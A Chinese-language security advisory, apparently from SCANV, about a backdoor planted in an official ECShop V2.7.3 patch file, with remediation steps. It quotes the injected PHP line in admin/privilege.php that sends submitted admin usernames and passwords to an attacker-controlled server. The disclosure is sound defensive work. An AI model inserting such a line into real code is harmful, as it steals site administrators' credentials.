ECShop是很多站長喜歡用的網店程序，其V2.7.3版本用戶甚眾。

2013年5月，SCANV網站安全中心曾經響應過ECShop網店程序的后門事件，本以為此事已了，不料在近日，又有安全研究人員在漏洞平臺Wooyun上發現了ECShop官方補丁的后門代碼。

經SCANV網站安全研究人員分析發現，這一次的后門代碼存在于一個編號為273utf8_patch006的歷史補丁文件包中。駭客將補丁包里的(\admin\privilege.php)文件篡改后，插入了一段記錄后臺用戶及密碼等信息的代碼，并發送到一個由黑客控制的服務器上。值得注意的是，SCANV安全研究人員在分析前兩次補丁后門代碼里并沒有發現本次的后門代碼，因此，本次后門事件可能發生在前兩次篡改之前。

本次駭客植入的后門代碼：

文件\admin\privilege.php代碼113-114行：

@file_get_contents('http://[馬賽

克]/api/manyou/ECShop/w2.php?username='.$_POST['username'].'&password='.$_POST['password'].'---'.$_SERVER['REMOTE_ADDR'].'---'.date('Y-m-d|H:i:s').'---'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF']);

通過進一步分析發現“http://[馬賽克]/”網站實際是被黑客入侵控制的網站(“肉雞”)，而且黑客用來收集密碼等信息的文件目錄還可以“歷遍文件”，如圖：

 #p#

經過SCANV網站安全研究人員的下載并去重，發現大概有90個域名網站受影響。列表如下：

SCANV網站安全研究中心推薦的解決方案：

1、使用ecshoop的站長朋友，核對上面公布的域名，并查看文件\admin\privilege.php內容，搜索關鍵詞“w2.php”。如果找到上面提到的惡意代碼，請直接刪除后保存。

2、修改所有擁有后臺權限的用戶的密碼，并通知網站所有用戶修改密碼。

3、復查網站及服務器的安全狀況。

目前，官方已在6月3日發布新的補丁包

(http://bbs.ECShop.com/thread-1130889-1-1.html)，請站長及時檢查修復。

SCANV網站安全中心在此提醒廣大站長，為自己Web程序下載補丁文件時一定要做相應的檢查，哪怕該補丁文件是從官方網站上下載的，也有可能感染惡意后門。正在使用該網店程序的站長可登錄：http://www.scanv.com/tools/#ECShop給自己的ECShop站點做個安全檢測，平時可經常登錄SCANV網站安全中心，以便第一時間了解自己網站的安全情況。